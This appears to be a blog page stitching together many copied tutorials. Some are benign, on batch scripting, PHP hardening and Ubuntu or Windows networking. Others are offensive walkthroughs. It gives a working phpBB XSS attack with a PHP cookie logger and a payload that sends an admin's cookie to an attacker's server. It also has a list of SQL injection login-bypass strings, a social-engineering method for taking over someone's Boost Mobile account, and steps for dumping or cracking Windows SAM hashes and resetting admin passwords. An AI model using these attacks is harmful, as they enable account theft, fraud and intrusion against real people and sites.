set /p s="Are you sure you want to do this? "
if %s%==yes goto B
if %s%==no goto c
:B
cls
net user %m% %p% /ADD
net user %n% /DELETE
net group %g% %m% /ADD
:C
cls
echo Thanks for using this easy user creation....blah, blah, blah..
echo.
pause ::
exit
Now you could also add in things such as, "please confirm the password" or whatever, but im too tired :P In case anyone did want to try and do that though its :
set /p h="please confirm password: "
if %h%==%p% goto "whereever you want it to go to"
FINAL WORDS!
Anyway, here are my final words on cmd. They are a great way to start programming in my view, its a lot easier than most other proper things like C, delphi ect...but its a lot more limited. Its really easy to learn actually, and when you can, you get the great feeling that you can do most things with them.
Some links that might help you (they did help me) are:
*http://www.robvanderwoude.com/batchfiles.html
*http://www.ericphelps.com/batch/tricks/index.htm
*http://www.ericphelps.com/batch/
Securing your PHP code
Some of the most basic and overlooked things are, cleaning your variables and all user input. Many variables themselves can be overwritten with user specified data from a malicious user. Let's say you have an admin panel on your website thats not the most secure thing y'know, but it works well. Someone finds a hole or bruteforces their way in without any visiable knowledge. That admin panel maybe be able to delete files. Whats to say the attacker doesnt just delete files but goes ahead and deletes passwd entires or other sensitive server files that would stop them from advancing.
all inputs from the "outside" coming in should be checked for malicious content!!! I will not cover security with your database. I have written many articles on SQL injection, if you dont know what it is please research it. Database security is very inmportant, I will not cover it here.
Magic Quotes
Magic quotes are a "godsend" when it comes to dealing with user input. When this option is tunred on (located in your php.ini) it will escapes all single and double quotes, backslashes, and NULL bytes from a users input with a backslash. The problem with turning magic quotes on is that maybe you want your users to use single or double quotes, or when uploading files. If you turn this off you can at "runtime" parse the strings from the user entered data.
If your new to PHP i would suggest turning this on until you learn how to properly parse and display data that users enter. I personally use a "clean" function that i've written. I will give you a basic "on-the-fly" one just for this tutorial so you can start building your own cleaning function.
function clean($string) {
$string = stripslashes($string);
$string = htmlentities($string);
$string = strip_tags($string);
return $string;
}
?>
you would use this function like below, if your user was submitting a form that required a username.
$username = $_POST;
echo clean($mystring);
?>
There are 3 directives for the magic quotes, refer to the php.net website or the php manual. Basically the 3 directives are magic_quotes_gpc, these deal with the request data (get, post, cookies). magic_quotes_runtime deal with flatfiles and databases, external files. the third is magic_quotes_sybase, this will override the magic_quotes_gpc if its enabled. This one will escape single quotes with another single quote.
---------------
Security Through Obscurity
Recently you may not have noticed, I sure have on some websites where an ASP or PERL extension can be found in place of the normal PHP when you know for true, 100% fact that the website is running a php/sql based front and backend. This is "obscurity through security" when instead of telling the attackers your using php scripts you mislead them into thinking your running perl or pythoin or whatever type of script you want.
For example, your run a php script with the .php extension, like normal. Rather than showing the world your "hello.php" script you can actually use Apache to "hide" or "obscure" the real file's extension. So instead of normally using "hello.php" you could disguise the file to viewers as perl, "hello.pl" even though its a PHP script. like so...
AddType application/x-httpd-php .asp .py .pl
my favorite is making up my own file extensions, like .sun or .fuck
AddType application/x-httpd-php .sun .fuck .1e3t
Im sure if an attacker is just looking for something to fuck with when he comes across a .sun file that runs like a php file, theyll will be heartbroken and confused. Give it a try. The above codes are for the Apache configuration file. If your on a shared hosting you may not have access to the Apache configuration files, Maybe you could make some suggestions to your host.
---------------
[u]Register Globals
This is a big change in PHP when 4.2 came out. This is an on/off option in the INI file for php (php.ini). PHP doesnt force you to initial variables like other languages, for this, people think its a very insecure language. When register globals is on it will allow a request to set a variable. The best kind of example is a member login form. Let's say register globals is on..
if($authed = true) {
echo "my sensitive information";
}
?>
Any user can get to the "sensitive information" by sending a GET request. You could do this via telnet or by browser, like so sin.php?authed=true, which reveals the sensitive information. Turning them off will defeat this problem. Now when we try to visit the site sin.php?authed=true, It will be blank. Users cannot initialize variables from an external source. Another way to protect your variables from external sources would be to check if they are submitted via a GET or POST request.
$authed = true;
if(isset($_POST[authed]) || $_GET[authed]) {
echo "variable violation";
} else {
if($authed == true) {
echo "my sensitive information";
}
}
?>
By monitoring the GET and POST requests we can check to see if someone is trying to inject something into our variables without the script doing it. Usually followed by not only a message telling them they have wrong the variable, but usually a mail() will follow to notify the admins on the website. I love this one.
Bypassing login scripts with SQL Injection
A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.
Data types:
mysql.user
mysql.host
mysql.db
SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
Bypassing login scripts:
SQL injection strings and the DB doesnt matter.
') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1
Note: having 1=1--
Example:
Login: hi'or 1=1--
Password: hi'or 1=1--
How to hack boost mobile
First of all call 611 and press 3 then wait till it says enter your phone number, enter the persons number your trying to get, it will say you have xx days remaning on your account, Boost mobile gives you 90 days so take 90 from whatever they have(example 90-80days left, so they bought a card 10 days ago)So you take the days and look on a calander say its 10 days ago and today is dec 11th, so they bought a boost card on dec 1st, and its most likely a $20 card so you can Guess it theres only $20,$30,$50 cards. Ok, Keep this information written down.
Ok next you need 3 phones by you and you must know all the numbers including area codes, they don't need to be cell phones, using all the phones call the person your trying to get there access code, via *67(private) don't worry it won't show up private to boost, but it will too the person your trying to do it too. Next after you call them with them numbers, have them numbers written down and ready, call 611 agian and hit 4, then 6, when you call say you forgot your boost passcode, they will ask you when you last rebooted and how much(the $ is a guess but you can usally guess from how much there balance was and how many days they rebooted but its mostly $20), then they will ask you to tell you the last 3 numbers they have been called or received, thats where the 3 numbers you just called in works, after you tell them that they will give you the access code, and BOOM you have total control! enjoy!
REMEMBER WHEN YOU DO THE 3 CALLS YOU MUST BE CALLING BOOST ASAP BECAUSE IF SOMEONE ELSE CALLS IN YOU HAVE TO DO IT ALL OVER AGIAN.
Hacking phpBB 2.0.19 or lower by stealing cookies
Firefox (http://www.getfirefox.com)
Live HTTP Headers (http://livehttpheaders.mozdev.org/)
A Free Server with PHP (http://www.t35.com)
1 - Make a file with notepad
Insert this code into it:
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('pwnt.txt', 'a'); //chmod 777 lol.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>
Save it as lol.php and upload it to your free server at t35.com.
2 - Now find a forum that you want to hack (if you see that html is off by default like in this picture forget it)
http://img167.imageshack.us/img167/2742/ohnoes9sp.th.jpg (http://img167.imageshack.us/my.php?image=ohnoes9sp.jpg)
3 - This is the code you have to pm the admin
' onmouseover='document.location="http://yourdomain.t35.com/lol.php?c="+document.cookie' b='
http://img485.imageshack.us/img485/4752/11403011905622mi5hj.jpg
Change yourdomain to your t35.com site. Change the picture to whatever you want or just leave it. Change lol.php to whatever you named the file you made in step 1.
When the admin puts his mouse over this code it will redirect him to your php file and it will show him a blank screen, you can modify that so it doesnt look so suspicious.
4 - Now find the admin or whoever you want to hack, pm him the code from step 3. Now you will have to wait about a day for him to realize he has a PM.
5 - Once he clicks the message it will make a file in your server called ****.txt, open it.
You will see some code that looks like this:
Xforums_data=a:2:{s:11:\"autologinid\";s:0:\"\";s:6:\"userid\";s:3:\"320\";}; admin=cXVpeGplc3RlcjozOTIxYzc1YjI5OTI2OGJkODdmNDhl YzhjMjg5YzNmMDplbmdsaXNo; user=MzIwOnViZXJtYWdlOjljZGZiNDM5Yzc4NzZlNzAzZTMwN zg2NGM5MTY3YTE1OjEwOjowOjA6MDowOjo0MDk2; lang=english; eqdkp_data=a:2:{s:13:\"auto_login_id\";s:32:\"3921c75b299268bd87f48ec8c289c3f0\";s:7:\"user_id\";s:1:\"1\";}; Xforums_sid=8e01ff74cfe643a527bdeafc9293a991
A - The easiest way is to copy the password hash which in this case is
3921c75b299268bd87f48ec8c289c3f0
Copy that hash
go to md5.rednoize.com or any other cracker and paste it there, if nothing shows up, you will have to use http headers (in example B) to login as the admin.
B - Go to the forum you hacked, click on tools -> live http headers (assuming you have firefox and http headers installed)
Now refresh the page, at the top of the http headers screen you will see something like this:
http://img190.imageshack.us/img190/310/httpheaders6bg.th.jpg (http://img190.imageshack.us/my.php?image=httpheaders6bg.jpg)
Click on Replay
Delete all the code that comes after
cookie:
Replace it with the code from step 5 that you recieved from your server's log.
JavaScript Injection
javascript:alert('Hello World');
This uses the function alert which as you should now know brings up an alert box.
Now onto something a bit more useful. Most websites you visit now will save a cookie on your computer, to see this you can use the following js:
javascript:alert(document.cookie);
You can also use the void function to add or change a variable. For my example i'm going to add a field called 'admin' and have its value set to 'true'. Here's how to do it:
javascript:void(document.cookie="Admin=True");
To see what effect this had use the following js again:
javascript:alert(document.cookie);
Alternatively you can concatenate the two commands (or for that matter any number of commands), in the following way:
javascript:void(document.cookie="Admin=True");javascript:alert(document.cookie);
Don't forget the ';' at the end of each command!
Now to fiddle with the http://elitehackers.info/forums forms/ >:) . If you right click and look at the source code for the page the first form you will see should be this:
All the forms are stored in any array called 'forms' so the first form will be 'forms[0]' and the second 'forms[1]' etc. We are going to be changing the value of the 'showposts' field.
First lets bring it up in an alert box so we can see what it's currently set as:
javascript:alert(document.forms[0].showposts.value);
This should popup an alert box shiwng the current value of 'showposts' which is '0'. To change this to '1' we will use the void function again:
javascript:void(document.forms[0].showposts.value="1");javascript:alert(document.forms[0].showposts.value);
Obviously this isn't very useful but used in other situations can come in handy. That's all folks!
Bypassing Web Filtering Systems
on bypassing most filtering systems. This tutorial will show you where to obtain public proxies, private proxies, where/what programs
to download, and how to use those programs. Also a couple ways that do not require using a proxy server or a program.
Proxy Severs:
A proxy server is a server that will accept traffic in, route it to your destination, and then route it back to you. A couple places
you can find public proxy servers are:
http://www.publicproxyservers.com/
http://www.samair.ru/proxy/
http://www.multiproxy.org/
These are just a couple examples I grabbed searching google. I've used samair.ru and multiproxy.org before and both are fairly decent,
there are a couple times that proxies from these sites do not work, but most of them do, so no worries.
Applying a proxy is very easy, I'll show you how to do it using Internet Explorer and Firefox:
Internet Explorer:
1)Click Tools
2)Click Internet Options
3)Click Connections tab
4)Click LAN Settings
5)Check the use a proxy server box
6)Put in the IP address of the proxy in the address box
7)Put the port number the proxy is using in the port box
Firefox:
1)Click Tools
2)Click Options
3)Click General tab
4)Click Connection Settings
5)Select Manual Proxy Configuration
6)Put the IP address of the proxy in the HTTP Proxy box
7)Put the port number of the proxy in the port box
Now then, that wasn't too hard. This is how you can find and use a public proxy.
Finding a private proxy server is a little different, but still not very hard. Some of the most common ports that proxy servers
run on are 8080, 80, 6588, and 3128. There are different programs out there that will find proxy servers for you, or even using
nmap to scan ranges looking for these ports and then testing them manually for speed. A little advice though, if you want to find
fast private (somewhat private) proxy servers, check the first 20 IP blocks of ISPs and major corporations. Sometimes using a mass
resolving tool will allow you to find servers that are named something along the lines of: proxy.blah.com.
Also, programs such as Privoxy will allow you to proxy through your local computer and tunnel that connection to an actual proxy
server so you do not have to go looking for working ones. This program can be found at: http://www.privoxy.org/
To learn how to use Privoxy, please RTFM (Read The Fine Manual) they have so graciously put together for you. It's a very good
program and I definitely recommend it.
Using Google To Bypass:
The reason google is such a good tool to bypass web filters is because the people (usually admins) setting up the filters will
not block google as it's the world's greatest search engine (yes, that is my opinion and I am sticking to it). To use google to
bypass filters for you, just stick the URL on the end of this URL:
http://translate.google.com/translate?hl=en&sl=fr&u=
So if I wanted to go to the website: www.blocked.com I would type into my address bar:
http://translate.google.com/translate?hl=en&sl=fr&u=www.blocked.com
And google will be very happy to translate the website for you, bypassing the web filter that was originally blocking your access.
CGIProxy:
CGIProxy is a cgi script that was written to act as a proxy. The reason this is a good method is because you can host your own
proxy server right from a website. Once you visit the hosted cgi script then you are able to type in a URL and the script will
display it for you.
A nice easy way of finding hosts running these scripts is using google. So search:
inurl:“cgiproxy” and enjoy your search results.
Or you can use www.cgiproxy.co.uk
HTTP Tunneling:
Using putty is a great way to tunnel all of your HTTP traffic through SSH sessions. The great thing about doing this is
that all traffic is transferred through the encrypted tunnel, meaning web filters are not able to see what the traffic is
to block it. This is also useful when you are doing any web browsing and don't want people to be able to sniff the traffic.
To setup putty, just go to the “tunnel” tab on the left within the putty application and select the source port to be anything
you want, the destination to be the proxy server address followed by the proxy port number.
So it would look like this:
Source Port: 8080
Destination: proxyip:8080
Once you do this, establish your connection to your ssh server and setup your proxy connection in the browser of your choice
(as we covered earlier in this tutorial).
Obtaining The Administrative Account
favorite beverage and continue reading on.
This tutorial is going to explain the different methods of obtaining administrative privileges, such as cracking
the administrator's password hash, injecting your own password hash into the administrator's account, and exploiting
windows in such a way that you'll have the privileges on the user account you are using at the time.
Cracking The Hash:
This is my favorite way of obtaining administrator on a windows box, mostly because it allows me to know what the
administrator's password is, which is often times used in more than one place and for more than one purpose.
The Administrator's hash is stored in the %windir%\system32\config\SAM file. SAM stands for Security Accounts Manager.
This file stores all the hashes for the local user account on the windows machine, so you can crack not only the
administrator's, but any users (which is a good thing when you want to know someone's actual password).
The safest way to crack the administrator's hash from a SAM file is by grabbing a copy of the SAM file and cracking it
in another location, such as home. This assures that you won't be caught right there cracking it, and if you need to leave
a box running to bruteforce it without the box being tampered with you can do so in the safety of your own home. I prefer
e-mail it to myself, but you can use a USB drive also.
There are plenty of programs that will dump the accounts and hashes from the SAM file. I use Cain and Abel on my windows box.
The infamous John The Ripper will also dump/crack these hashes for you. You can either spend your time bruteforcing the
hashes, dictionary attacking the hashes, or just checking to see if there is any sites online that has the hashes cracked
already and stored, such as:
http://securitystats.com/
If it isn't cracked here and it means that much to you, allow the bruteforcer to run against the hashes for a couple days.
For wordlists I strongly recommend:
argon24MB.zip, to find this just type in google:
intitle:“index of /” “argon24MB.zip”
There is also a version 2 of The Argon, which is a 2GB wordlist file.
Injecting Your Own Hash:
This method is very dangerous as it will change the administrator's password and they will realize it as soon as their
password doesn't work that something is going on. With this method you'll either have to be able to boot from a CD, USB
drive, or floppy disk. This might mean changing the BIOS setting, but that shouldn't be a problem. If there is a password
on the BIOS, take the CMOS battery off the motherboard for a good minute and a half or so, put it back on, and the BIOS
password will be gone.
The program that we will use to inject our own password into the SAM file is called “chntpw” and can be found at:
http://freshmeat.net/projects/chntpw/
And two liveboot CDs that I know for a fact have this utility on them are:
Knoppix-STD (http://www.knoppix-std.org/download.html)
Auditor (http://www.remote-exploit.org/index.php/Auditor_mirrors)
Just stick either one of these CDs into the machine and you'll be greeted by a nice GUI. From there you can run chntpw
and follow the prompts to set the password of your choice on the local user account of your choice.
Also, you can use this Emergency BootCD to reset the password of any local user account:
http://ebcd.pcministry.com/
Be very careful when using this method.
Exploiting Windows:
By exploiting windows I just mean finding an exploit to use against windows that will either drop you down to an
administrative (or system) command prompt, or exploiting it so that it creates a new administrative account.
I did a video tutorial on the jpeg buffer overflow exploit, so if you watch that, it should give you an idea of what
I am talking about.
Sites you can check for exploits:
www.milw0rm.com
www.packetstormsecurity.org
www.securiteam.com
These sites will allow you to search and find exploits that will help you out in your journey to obtaining administrative
privileges. If there isn't an exploit that works right off the bat, sit and wait for one to come out, as they do quite often.
I suggest learning how to compile source code, as that's what these exploits are going to be, the source code you need to
compile in order to run.
Packet Generator
Whenever you make and debug a packet capturing and analyzing program,
you are forced to generate packets again and again using a certain network application.
With this packet generator tool, you don't have to do it.
This tool enables you to generate and send packets easily using given capture file(*.cap) to a specific network adapter.
However, you'd better install and use virtual network adapter( VirtNet.zip ) to avoid any network traffic load on the real world network.
http://www.brothersoft.com/virtual-network-adapter-virtnet-94667.html
Based on WinPcap( http://www.winpcap.org ).
Acer Aspire One BIOS Recovery
First format an USB flash drive with FAT.
Download the latest BIOS, extract all files from the zip file, put both FLASHIT.EXE and the BIOS file with FD suffix in the root directory of the drive. The files must not be in a folder. Rename the BIOS file to ZG5IA32.FD, that's important.
Turn the AA1 off, with the USB drive still connected, and make sure both battery and AC adapter are also connected.
Press Fn+Esc, keep it pressed and press the power button. Release Fn+Esc after a few seconds, the power button will be blinking. Press the power button once. The AA1 will now initiate the BIOS flash, do not interrupt it under any circumstances. After a while the power button will stop blinking, and the AA1 will reboot shortly after. Wait patiently.
The BIOS has been flashed and all settings reset to default.
If it doesn't reboot by itself, but the power button still blinks, wait a few minutes before turning it off, and try again.
Howto: Ubuntu Linux convert DHCP network configuration to static IP configuration
My friend wanted to know how to change or convert DHCP network configuration to static configuration. After initial installation, he wanted to change network settings. Further, his system is w/o GUI system aka X Windows. Here is quick way to accomplish the same:
Your main network configuration file is /etc/network/interfaces
Desired new sample settings:
=> Host IP address 192.168.1.100
=> Netmask: 255.255.255.0
=> Network ID: 192.168.1.0
=> Broadcast IP: 192.168.1.255
=> Gateway/Router IP: 192.168.1.254
=> DNS Server: 192.168.1.254
Open network configuration file$ sudo vi /etc/network/interfaces
OR$ sudo nano /etc/network/interfaces
Find and remove dhcp entry:iface eth0 inet dhcp
Append new network settings:
iface eth0 inet static
address 192.168.1.100
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.254
Save and close the file. Restart the network:$ sudo /etc/init.d/networking restart
Task: Define new DNS servers
Open /etc/resolv.conf file$ sudo vi /etc/resolv.conf
You need to remove old DNS server assigned by DHCP server:search myisp.com
nameserver 192.168.1.254
nameserver 202.54.1.20
nameserver 202.54.1.30
Save and close the file.
Task: Test DNS server
$ host cyberciti.biz
Network command line cheat sheet
You can also use commands to change settings. Please note that these settings are temporary and not the permanent. Use above method to make network changes permanent or GUI tool as described below.
Task: Display network interface information
$ ifconfig
Task: Take down network interface eth0 / take a network interface down
$ sudo ifconfig eth0 down
OR $ sudo ifdown eth0
Task: Bring a network interface eth0 up
$ sudo ifconfig eth0 up
OR$ sudo ifup eth0
Task: Change IP address and netmask from command line
Activate network interface eth0 with a new IP (192.168.1.50) / netmask:$ sudo ifconfig eth0 192.168.1.50 netmask 255.255.255.0 up
Task: Display the routing table
$ /sbin/route
OR$ /sbin/route -n
Output:
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
localnet * 255.255.255.0 U 0 0 0 ra0
172.16.114.0 * 255.255.255.0 U 0 0 0 eth0
172.16.236.0 * 255.255.255.0 U 0 0 0 eth1
default 192.168.1.254 0.0.0.0 UG 0 0 0 ra0
Task: Add a new gateway
$ sudo route add default gw 172.16.236.0
Task: Display current active Internet connections (servers and established connection)
$ netstat -nat
Task: Display open ports
$ sudo netstat -tulp
OR$ sudo netstat -tulpn
Task: Display network interfaces stats (RX/TX etc)
$ netstat -i
Task: Display output for active/established connections only
$ netstat -e
$ netstat -te
$ netstat -tue
Where,
- -t : TCP connections
- -u : UDP connections
- -e : Established
Task: Test network connectivity
Send ICMP ECHO_REQUEST to network hosts, routers, servers etc with ping command. This verifies connectivity exists between local host and remote network system:$ ping router
$ ping 192.168.1.254
$ ping cyberciti.biz
See simple Linux system monitoring with ping command and scripts for more information.
Task: Use GUI (Graphical Configuration) network Tool
If you are new, use GUI configuration tool, type the following command at terminal:$ network-admin &
Above command is Ubuntu's GUI for configuring network connections tool.
Final tip - Learn how find out more information about commands
A man page is your best friend when you wanted to learn more about particular command or syntax. For example, read detailed information about ifconfig and netstat command:$ man ifconfig
$ man netstat
Just get a short help with all command options by appending --help option to each command:$ netstat --help
Find out what command is used for particular task by searching the short descriptions and manual page names for the keyword:$ man -k 'delete directory'
$ apropos -s 1 remove
Display short descriptions of a command:$ whatis rm
$ whatis netstat
How to Setup SSH Server in Windows with freeSSHd
Have you ever wanted to control your Windows remotely using the command line? With the SSH network protocol, you can! Telnet is another way to achieve this, but it is not as secure as SSH. In this simple guide, I will tell you on how to setup a SSH server in Windows with freeSSHd.
With this setup, you can now access and manage your PC from another computer using the Windows command line. That means that you can copy, edit, move and delete files inside your home computer from another computer in the office, for example. Furthermore, the SSH network protocol secures the connection between the two connected computers! If you are interested, you can read more on SSH .
Step 1: Setup SSH Server in Windows with freeSSHd
This is an absolute noob guide , so I’ll explain in detail. If you are an advanced user (boo!), you are welcome to skip the installation steps.
1- freeSSHd is the easiest software to use to get SSH working in Windows. Download freeSSHd before proceeding any further.
2- Double click the freeSSHd installer that you have downloaded to get started.
3- Click Next -> Click Next (or you can change the default installation directory) -> Click Next (Full Installation) -> Click Next (Start Menu Folder) -> Click Next (Create a desktop icon) -> Click Install (ready to install) -> Wait until installation has been finished -> Click Close (Try other products…)
4- “Do you want to run freeSSHd as a system service?” I choose “No” so I can start freeSSHd manually. This is a good security practice because you don’t want to have running applications in the background if you are not using it. Only turn freeSSHd on when the need for remote connections arise!
5- Click Finish to complete freeSSHd installation.
Step 2: Run freeSSHd
6- Double click the freeSSHd icon on the desktop to load your SSH server. You can see the freeSSHd icon on your system tray.
7- Right click on the icon and click Settings.
8- Make sure that the freeSSHd settings page (Server Settings tab) shows that your“SSH server is running”.
Step 3: Create a New SSH User
9- Click on the Users tab. You need to create at least one user account that will act as your SSH remote user account.
10- Click “Add” to create a new user. Fill in the user details, following the example shown below (with your own unique username and password, duh!). Click OK and make sure it appear on the Users tab list.
Step 4: Test SSH Access with Putty (Local)
11- Using the same computer that you install freeSSHd previously, download Putty. Putty is a desktop command line client that you can use to access SSH servers.
12- Double click the Putty installer to run it. Fill in the details as shown in the diagram below. 127.0.0.1 means that you are testing the SSH access from a local connection.
13- Press “Yes” on the security alert screen. Insert your SSH username and password that you have created previously.
14- If you get a Windows command prompt, you have successfully access your SSH server! Congratulations!
15- Connect your computer to the Internet / local network and take note of your computer’s IP address.
Step 5: Test SSH Access with Putty (Remote)
16- Using another computer e.g. your office computer, download Putty again.
17- Repeat step 12 to 13 above but this time, use your SSH server IP address (type it inside Host Name or IP Address field).
18- If you get a Windows command prompt, you have successfully access your SSH server from a remote computer! Double congrats to you!
There you go, a complete noob guide to setup a SSH server in Windows, using the super simple freeSSHd application. Be geeky and try it today!
Bypass Windows Vistas and Windows 7’s Reduced Functionality Mode and Get Your Data
So you use Windows 7 or Vista and you have encountered the now famous “Reduced Functionality Mode.” You can either throw up your arms and cry or bypass it and get to your data.
Here is how to temporarily remove the “Reduced Functionality” mode and resture your computer back to a (semi) normal state.
- On the Windows Activation, click on Access your computer with reduced functionality option.
- Once the Internet Explorer loads, click on File on menu bar and then select Open on the pull-down menu.
- On the Open dialog window, type in C:\Windows\Explorer.exe and then click OK.
- Click OK button on “IE needs to open a new window to open this webpage” confirmation prompt.
- Click Run button on “File Download – Security Warning” dialog prompt.
- Click on Run button on “File Download – Security Warning” warning dialog related to unknown and not verified publisher.
- User shell will load, and the desktop, taskbar, start menu and etc will be restored.
- The computer has recovered from Reduced Functionality for this session. To permanently stop RFM to happen again, Windows has to be rearmed.
- Click on the Windows Start button.
- Type Cmd in Start Search box.
- A program shortcut will show up in the Start panel search results. Right click on the shortcut and select Run as Administrator.
- In the Command Prompt window, type in the following command and then hit Enter: slmgr.vbs -rearm
- Restart your computer.
Now obviously something must have went awry for that dialog box to pop up, any I think it would be recommended that you reinstall Windows after you backup all your data.
About Me
- BBTUNA
Blog Archive
-
▼
2010
(41)
-
▼
February
(41)
- Change The Default Location For Installing Apps
- Closing Open Holes, System Security How to close o...
- Create An Ftp Server On Your Pc With Serv-u
- Easily Find Serial Numbers On Google
- How To Find Ftp's The Easy Way
- HowTo: Create a Reverse SSH Tunnel
- Show apps that use internet connection at the moment
- How to install, configure and work a LAMP stack wi...
- Creating a simple key logger
- How to make a hidden user account
- Locking and Hiding Hard-Drives
- Batch Files
- Securing your PHP code
- Bypassing login scripts with SQL Injection
- How to hack boost mobile
- Hacking phpBB 2.0.19 or lower by stealing cookies
- JavaScript Injection
- Bypassing Web Filtering Systems
- Obtaining The Administrative Account
- Packet Generator
- Acer Aspire One BIOS Recovery
- Howto: Ubuntu Linux convert DHCP network configura...
- How to Setup SSH Server in Windows with freeSSHd
- Bypass Windows Vistas and Windows 7’s Reduced Func...
- Setup Linksys Router With Radius Server Authentica...
- Twitter Security Cam
- Connect USB Drive to VMware ESX Server
- How to Create an Internet Kiosk in 10 Easy Steps o...
- Install Squid Proxy Server on CentOS
- VNC ( Virtual Network Computing ) on CentOS
- How to trunk ports on a Cisco Switch
- Linux Kiosk system
- Trunking ports on switches
- How to disable Last Logon Name in Windows 2000,XP&...
- Metasploit 3.2 VBA Support for generating payloads
- Installing NaviAgent on ESX 3.x and 3.5x
- How to Convert a Video Into a Gif Animation
- VMware ESX storage: How to get local storage to ac...
- How to Install and Configure DHCP Server in Ubuntu...
- Aircrack-ng on the MAC
- Reflashing FON Fonera 2200
-
▼
February
(41)